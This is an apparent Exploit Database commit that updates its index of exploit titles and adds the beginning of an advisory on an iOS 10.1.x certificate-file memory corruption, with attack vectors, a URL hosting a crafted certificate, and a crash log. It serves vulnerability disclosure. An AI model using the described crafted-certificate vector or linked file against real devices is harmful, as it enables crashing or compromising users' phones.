DB: 2016-12-14

7 new exploits

Microsoft Internet Explorer 9 IEFRAME - CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)

Xitami Web Server 5.0a0 - Denial of Service
OpenSSL 1.1.0a/1.1.0b - Denial of Service
Serva 3.0.0 HTTP Server - Denial of Service
iOS 10.1.x - Certificate File Memory Corruption

OpenBSD 4.0 - (vga) Privilege Escalation
OpenBSD 4.0 - 'vga' Privilege Escalation

10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow

MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections
MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections

AShop Deluxe 4.x - (catalogue.php cat) SQL Injection
AShop Deluxe 4.x - 'catalogue.php' SQL Injection

HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion
HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion

CAT2 - (spaw_root) Local File Inclusion
CAT2 - 'spaw_root' Parameter Local File Inclusion

MyBloggie 2.1.3 - search.php SQL Injection
MyBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - delcomment.php Multiple Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - edituser.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - editcat.php errormsg Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - delcat.php cat_id Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - del.php post_id Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'delcomment.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'deluser.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'addcat.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'adduser.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'trackback_url' Parameter Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting
MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting

MyBloggie 2.1.x - Multiple Remote File Inclusion

MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion
MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion
AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter Cross-Site Scripting
AShop Deluxe 4.5 - ashop/basket.php cat Parameter Cross-Site Scripting
AShop Deluxe 4.5 - ashop/search.php SearchString Parameter Cross-Site Scripting
AShop Deluxe 4.5 - shipping.php Multiple Parameter Cross-Site Scripting
AShop Deluxe 4.5 - admin/editcatalogue.php cat Parameter Cross-Site Scripting
AShop Deluxe 4.5 - admin/salesadmin.php resultpage Parameter Cross-Site Scripting
AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'shipping.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting
AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting

MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting
MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting

MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting
MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting
Smart Guard Network Manager 6.3.2 - SQL Injection
WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery
This commit is contained in:
Offensive Security 2016-12-14 05:01:23 +00:00
parent 96bd05d39d
commit b080c70f8b
10 changed files with 536 additions and 53 deletions

View file

@ -3556,6 +3556,7 @@ id,file,description,date,author,platform,type,port
27925,platforms/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",linux,dos,0
27930,platforms/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 - MHTML URI Buffer Overflow",2006-05-31,Mr.Niega,windows,dos,0
27942,platforms/hardware/dos/27942.txt,"AVTECH DVR Firmware 1017-1003-1009-1003 - Multiple Vulnerabilities",2013-08-29,"Core Security",hardware,dos,0
40907,platforms/windows/dos/40907.html,"Microsoft Internet Explorer 9 IEFRAME - CSelection­Interact­Button­Behavior::_Update­Button­Location Use-After-Free (MS13-047)",2016-12-12,Skylined,windows,dos,0
27993,platforms/multiple/dos/27993.txt,"FreeType - '.TTF' File Remote Denial of Service",2006-06-08,"Josh Bressers",multiple,dos,0
27981,platforms/linux/dos/27981.c,"GD Graphics Library 2.0.33 - Remote Denial of Service",2006-06-06,"Xavier Roche",linux,dos,0
28001,platforms/windows/dos/28001.c,"Microsoft SMB Driver - Local Denial of Service",2006-06-13,"Ruben Santamarta",windows,dos,0
@ -3996,7 +3997,7 @@ id,file,description,date,author,platform,type,port
31763,platforms/windows/dos/31763.py,"SolidWorks Workgroup PDM 2014 SP2 Opcode 2001 - Denial of Service",2014-02-19,"Mohamed Shetta",windows,dos,30000
31785,platforms/multiple/dos/31785.txt,"Multiple Platform IPv6 Address Publication - Denial of Service Vulnerabilities",2008-05-13,"Tyler Reguly",multiple,dos,0
31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 - 'CATV5_Backbone_Bus' Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555
40849,platforms/windows/dos/40849.py,"Xitami Web Server 5.0a0 - Denial of Service",2016-11-30,"Stefan Petrushevski",windows,dos,0
40849,platforms/windows/dos/40849.py,"Xitami Web Server 5.0a0 - Denial of Service",2016-11-30,sm,windows,dos,0
31815,platforms/linux/dos/31815.html,"libxslt XSL 1.1.23 - File Processing Buffer Overflow",2008-05-21,"Anthony de Almeida Lopes",linux,dos,0
31817,platforms/multiple/dos/31817.html,"Mozilla Firefox 2.0.0.14 - JSframe Heap Corruption Denial of Service",2008-05-21,0x000000,multiple,dos,0
31818,platforms/windows/dos/31818.sh,"vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)",2008-05-21,"Martin Nagy",windows,dos,0
@ -5300,6 +5301,9 @@ id,file,description,date,author,platform,type,port
40886,platforms/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",hardware,dos,0
40888,platforms/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",linux,dos,0
40896,platforms/windows/dos/40896.html,"Microsoft Internet Explorer 9 MSHTML - CElement::Has­Flag Memory Corruption",2016-12-09,Skylined,windows,dos,0
40899,platforms/linux/dos/40899.py,"OpenSSL 1.1.0a/1.1.0b - Denial of Service",2016-12-11,Silverfox,linux,dos,0
40905,platforms/windows/dos/40905.py,"Serva 3.0.0 HTTP Server - Denial of Service",2016-12-12,LiquidWorm,windows,dos,0
40906,platforms/ios/dos/40906.txt,"iOS 10.1.x - Certificate File Memory Corruption",2016-12-12,"Maksymilian Arciemowicz",ios,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5865,7 +5869,7 @@ id,file,description,date,author,platform,type,port
5667,platforms/windows/local/5667.py,"VideoLAN VLC Media Player 0.8.6d SSA Parsing Double Sh311 - Universal Exploit",2008-05-23,j0rgan,windows,local,0
5837,platforms/windows/local/5837.c,"Deterministic Network Enhancer - 'dne2000.sys' Kernel Ring0 SYSTEM Exploit",2008-06-17,mu-b,windows,local,0
5951,platforms/windows/local/5951.c,"XnView 1.93.6 - '.taac' Local Buffer Overflow (PoC)",2008-06-26,Shinnok,windows,local,0
5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - (vga) Privilege Escalation",2008-07-01,"lul-disclosure inc.",openbsd,local,0
5979,platforms/openbsd/local/5979.c,"OpenBSD 4.0 - 'vga' Privilege Escalation",2008-07-01,"lul-disclosure inc.",openbsd,local,0
6030,platforms/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - '.m3u' Local Buffer Overflow",2008-07-08,h07,windows,local,0
6031,platforms/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - (export name) Buffer Overflow (PoC)",2008-07-08,Defsanguje,windows,local,0
6032,platforms/linux/local/6032.py,"Poppler 0.8.4 - libpoppler Uninitialized pointer Code Execution (PoC)",2008-07-08,"Felipe Andres Manzano",linux,local,0
@ -8692,6 +8696,7 @@ id,file,description,date,author,platform,type,port
40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
40903,platforms/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow",2016-12-10,malwrforensics,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -16370,7 +16375,7 @@ id,file,description,date,author,platform,type,port
2115,platforms/php/webapps/2115.txt,"Kayako eSupport 2.3.1 - (subd) Remote File Inclusion",2006-08-02,beford,php,webapps,0
2116,platforms/php/webapps/2116.txt,"TSEP 0.942 - (colorswitch.php) Remote File Inclusion",2006-08-02,beford,php,webapps,0
2117,platforms/php/webapps/2117.php,"SendCard 3.4.0 - Unauthorized Administrative Access",2006-08-03,rgod,php,webapps,0
2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - (trackback.php) Multiple SQL Injections",2006-08-07,rgod,php,webapps,0
2118,platforms/php/webapps/2118.php,"MyBloggie 2.1.4 - 'trackback.php' Multiple SQL Injections",2006-08-07,rgod,php,webapps,0
2119,platforms/php/webapps/2119.txt,"PHP Simple Shop 2.0 - 'abs_path' Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
2120,platforms/php/webapps/2120.txt,"PHP Live Helper 2.0 - 'abs_path' Parameter Remote File Inclusion",2006-08-07,Matdhule,php,webapps,0
2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 - (pfad) Remote File Inclusion",2006-08-07,SHiKaA,php,webapps,0
@ -19064,12 +19069,12 @@ id,file,description,date,author,platform,type,port
5973,platforms/php/webapps/5973.php,"Pivot 1.40.5 - Dreamwind load_template() Credentials Disclosure",2008-06-30,Nine:Situations:Group,php,webapps,0
5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple SQL Injections",2008-06-30,anonymous,php,webapps,0
5975,platforms/php/webapps/5975.txt,"MyBloggie 2.1.6 - Multiple SQL Injections",2008-06-30,"Jesper Jurcenoks",php,webapps,0
5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - (catalogue.php cat) SQL Injection",2008-06-30,n0c0py,php,webapps,0
5976,platforms/php/webapps/5976.pl,"AShop Deluxe 4.x - 'catalogue.php' SQL Injection",2008-06-30,n0c0py,php,webapps,0
5977,platforms/php/webapps/5977.txt,"pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection",2008-06-30,DNX,php,webapps,0
5980,platforms/php/webapps/5980.txt,"Mambo Component N-Gallery - Multiple SQL Injections",2008-06-30,AlbaniaN-[H],php,webapps,0
5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - (hm) Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
5981,platforms/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Parameter Remote File Inclusion",2008-06-30,"Ghost Hacker",php,webapps,0
5982,platforms/php/webapps/5982.txt,"PHP-Agenda 2.2.4 - 'index.php' Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
5983,platforms/php/webapps/5983.txt,"CAT2 - (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
5983,platforms/php/webapps/5983.txt,"CAT2 - 'spaw_root' Parameter Local File Inclusion",2008-07-01,StAkeR,php,webapps,0
5984,platforms/php/webapps/5984.txt,"Sisplet CMS - 'index.php id' 2008-01-24 SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
5985,platforms/php/webapps/5985.txt,"VanGogh Web CMS 0.9 - (article_ID) SQL Injection",2008-07-01,"CWH Underground",php,webapps,0
5986,platforms/php/webapps/5986.php,"PHP-Nuke Platinium 7.6.b.5 - Remote Code Execution",2008-07-01,"Charles Fol",php,webapps,0
@ -28115,7 +28120,6 @@ id,file,description,date,author,platform,type,port
26319,platforms/php/webapps/26319.txt,"Monkey CMS - Multiple Vulnerabilities",2013-06-19,"Yashar shahinzadeh_ Mormoroth",php,webapps,0
26328,platforms/php/webapps/26328.txt,"Utopia News Pro 1.1.3 - footer.php Multiple Parameter Cross-Site Scripting",2005-10-07,rgod,php,webapps,0
26324,platforms/php/webapps/26324.txt,"TellMe 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2005-10-05,"Donnie Werner",php,webapps,0
26326,platforms/php/webapps/26326.html,"MyBloggie 2.1.3 - search.php SQL Injection",2005-10-06,trueend5,php,webapps,0
26335,platforms/asp/webapps/26335.txt,"Aenovo - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2005-10-07,"farhad koosha",asp,webapps,0
26337,platforms/php/webapps/26337.php,"Cyphor 0.19 - lostpwd.php nick Field SQL Injection",2005-10-08,rgod,php,webapps,0
26338,platforms/php/webapps/26338.txt,"Cyphor 0.19 - newmsg.php fid Parameter SQL Injection",2005-10-08,retrogod@aliceposta.it,php,webapps,0
@ -28941,16 +28945,16 @@ id,file,description,date,author,platform,type,port
27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 - comments_do.php Multiple Variable POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0
27376,platforms/ios/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,ios,webapps,0
27379,platforms/php/webapps/27379.txt,"ADP Forum 2.0.x - Subject Field HTML Injection",2006-03-09,liz0,php,webapps,0
27380,platforms/php/webapps/27380.txt,"MyBloggie 2.1.2/2.1.3 - upload.php Multiple Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27381,platforms/php/webapps/27381.txt,"MyBloggie 2.1.2/2.1.3 - delcomment.php Multiple Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27382,platforms/php/webapps/27382.txt,"MyBloggie 2.1.2/2.1.3 - deluser.php 'id' Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27383,platforms/php/webapps/27383.txt,"MyBloggie 2.1.2/2.1.3 - addcat.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27384,platforms/php/webapps/27384.txt,"MyBloggie 2.1.2/2.1.3 - edituser.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27385,platforms/php/webapps/27385.txt,"MyBloggie 2.1.2/2.1.3 - adduser.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27386,platforms/php/webapps/27386.txt,"MyBloggie 2.1.2/2.1.3 - editcat.php errormsg Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27387,platforms/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - add.php trackback_url Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27388,platforms/php/webapps/27388.txt,"MyBloggie 2.1.2/2.1.3 - delcat.php cat_id Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27389,platforms/php/webapps/27389.txt,"MyBloggie 2.1.2/2.1.3 - del.php post_id Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27380,platforms/php/webapps/27380.txt,"MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27381,platforms/php/webapps/27381.txt,"MyBloggie 2.1.2/2.1.3 - 'delcomment.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27382,platforms/php/webapps/27382.txt,"MyBloggie 2.1.2/2.1.3 - 'deluser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27383,platforms/php/webapps/27383.txt,"MyBloggie 2.1.2/2.1.3 - 'addcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27384,platforms/php/webapps/27384.txt,"MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27385,platforms/php/webapps/27385.txt,"MyBloggie 2.1.2/2.1.3 - 'adduser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27386,platforms/php/webapps/27386.txt,"MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27387,platforms/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - 'trackback_url' Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27388,platforms/php/webapps/27388.txt,"MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27389,platforms/php/webapps/27389.txt,"MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0
27390,platforms/php/webapps/27390.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0
27391,platforms/php/webapps/27391.txt,"DCP-Portal 3.7/4.x/5.x/6.x - calendar.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0
27392,platforms/php/webapps/27392.txt,"DCP-Portal 3.7/4.x/5.x/6.x - forums.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0
@ -29372,7 +29376,6 @@ id,file,description,date,author,platform,type,port
27954,platforms/php/webapps/27954.txt,"Ovidentia 5.6.x/5.8 - search.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
27955,platforms/php/webapps/27955.txt,"Ovidentia 5.6.x/5.8 - posts.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
27956,platforms/php/webapps/27956.txt,"Ovidentia 5.6.x/5.8 - options.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
27957,platforms/php/webapps/27957.txt,"MyBloggie 2.1.x - Multiple Remote File Inclusion",2006-06-02,ERNE,php,webapps,0
27958,platforms/php/webapps/27958.txt,"DELTAScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0
27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0
27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 - Viewmsg.asp SQL Injection",2006-06-02,ajann,asp,webapps,0
@ -29623,7 +29626,7 @@ id,file,description,date,author,platform,type,port
28362,platforms/php/webapps/28362.txt,"Simple One File Guestbook 1.0 - Security Bypass",2006-08-09,omnipresent,php,webapps,0
28363,platforms/php/webapps/28363.txt,"CLUB Nuke 2.0 - Multiple SQL Injections",2006-08-09,ASIANEAGLE,php,webapps,0
28364,platforms/php/webapps/28364.txt,"XennoBB 1.0.5/1.0.6/2.1/2.2 - profile.php Directory Traversal",2006-08-09,"Chris Boulton",php,webapps,0
28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - MyBloggie_Root_Path Parameter Multiple Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0
28366,platforms/php/webapps/28366.txt,"MyBloggie 2.1.x - 'MyBloggie_Root_Path' Parameter Remote File Inclusion",2006-06-02,sh3ll,php,webapps,0
28370,platforms/php/webapps/28370.txt,"Mafia Moblog 6 - Big.php Remote File Inclusion",2006-08-10,sh3ll,php,webapps,0
28371,platforms/php/webapps/28371.txt,"YaBBSE 1.x - 'index.php' Cross-Site Scripting",2006-08-10,O.U.T.L.A.W,php,webapps,0
28372,platforms/php/webapps/28372.txt,"Tiny Web Gallery 1.5 - Image Parameter Multiple Remote File Inclusion",2006-08-10,x0r0n,php,webapps,0
@ -30379,12 +30382,12 @@ id,file,description,date,author,platform,type,port
29370,platforms/php/webapps/29370.txt,"PHP iCalendar 1.1/2.x - preferences.php Multiple Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0
29372,platforms/php/webapps/29372.txt,"Mobilelib Gold - Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps,0
29373,platforms/asp/webapps/29373.txt,"Spooky 2.7 - login/register.asp SQL Injection",2006-12-30,Doz,asp,webapps,0
29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - ashop/catalogue.php Multiple Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 - ashop/basket.php cat Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 - ashop/search.php SearchString Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 - shipping.php Multiple Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 - admin/editcatalogue.php cat Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 - admin/salesadmin.php resultpage Parameter Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29377,platforms/php/webapps/29377.txt,"AShop Deluxe 4.5 - 'catalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29378,platforms/php/webapps/29378.txt,"AShop Deluxe 4.5 - 'basket.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29379,platforms/php/webapps/29379.txt,"AShop Deluxe 4.5 - 'search.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29380,platforms/php/webapps/29380.txt,"AShop Deluxe 4.5 - 'shipping.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29381,platforms/php/webapps/29381.txt,"AShop Deluxe 4.5 - 'editcatalogue.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29382,platforms/php/webapps/29382.txt,"AShop Deluxe 4.5 - 'salesadmin.php' Cross-Site Scripting",2007-01-02,"Hackers Center Security",php,webapps,0
29384,platforms/php/webapps/29384.txt,"RI Blog 1.3 - search.asp Cross-Site Scripting",2007-01-05,ShaFuck31,php,webapps,0
29385,platforms/asp/webapps/29385.txt,"Kolayindir Download - down.asp SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0
29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error-Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0
@ -30458,9 +30461,9 @@ id,file,description,date,author,platform,type,port
29487,platforms/php/webapps/29487.txt,"Indexu 5.0/5.3 - new.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
29488,platforms/php/webapps/29488.txt,"Indexu 5.0/5.3 - mailing_list.php Multiple Variables Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php' Error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0
29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80
29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' PATH_INFO Parameter Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
29492,platforms/php/webapps/29492.txt,"MyBloggie 2.1.5 - 'login.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0
29497,platforms/php/webapps/29497.txt,"Easebay Resources Paypal Subscription - Manager Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
29498,platforms/php/webapps/29498.txt,"Easebay Resources Login Manager - Multiple Input Validation Vulnerabilities",2007-01-20,Doz,php,webapps,0
29499,platforms/php/webapps/29499.txt,"SMF 1.1 - 'index.php' HTML Injection",2007-01-20,"Aria-Security Team",php,webapps,0
@ -36865,3 +36868,5 @@ id,file,description,date,author,platform,type,port
40889,platforms/cgi/webapps/40889.txt,"Netgear R7000 - Command Injection",2016-12-07,Acew0rm,cgi,webapps,0
40898,platforms/hardware/webapps/40898.txt,"Netgear R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",hardware,webapps,0
40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0
40904,platforms/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps,0
40908,platforms/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80

Can't render this file because it is too large.

139
platforms/ios/dos/40906.txt Executable file
View file

@ -0,0 +1,139 @@
Source: https://cxsecurity.com/issue/WLB-2016110046
iOS 10.1.x Remote memory corruption through certificate file
Credit: Maksymilian Arciemowicz from https://cxsecurity.com
--------------------------------------------------------------------------------------
0. Short description
Special crafted certificate file may lead to memory corruption of several processes and the vector attack may be through Mobile Safari or Mail app. Attacker may control the overflow through the certificate length in OCSP field
--------------------------------------------------------------------------------------
1. Possible vectors of attack
- Apple Mail (double click on certificate)
- Safari Mobile ( go to special crafted link eg https://cert.cx/appleios10/700k.php which will redirect you to CRT file )
- other unspecified
--------------------------------------------------------------------------------------
2. Symptoms of memory overflow
By appropriate length of the certificate, an attacker can trigger crash of:
- profiled
- Preferences
- other unexpected behaviors
--------------------------------------------------------------------------------------
3. Crash log:
- profiled
---------------------------------------------------------------
{"app_name":"profiled","app_version":"","bug_type":"109","timestamp":"2016-09-20 09:15:09.85 +0200","os_version":"iPhone OS 10.0.1 (14A403)","incident_id":"XXXXXXXXXXXXXX","slice_uuid":"XXXXXXXXXXXXXX","build_version":"","is_first_party":true,"share_with_app_devs":false,"name":"profiled"}
Incident Identifier: XXXXXXXXXXXXXX
CrashReporter Key: XXXXXXXXXXXXXX
Hardware Model: iPhone6,2
Process: profiled [1595]
Path: /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
Identifier: profiled
Version: ???
Code Type: ARM-64 (Native)
Role: Unspecified
Parent Process: launchd [1]
Coalition: <none> [253]
Date/Time: 2016-09-20 09:15:09.7892 +0200
Launch Time: 2016-09-20 09:15:01.1603 +0200
OS Version: iPhone OS 10.0.1 (14A403)
Report Version: 104
Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x000000016e193ca0
Termination Signal: Segmentation fault: 11
Termination Reason: Namespace SIGNAL, Code 0xb
Terminating Process: exc handler [0]
Triggered by Thread: 2
---------------------------------------------------------------
- Preferences
---------------------------------------------------------------
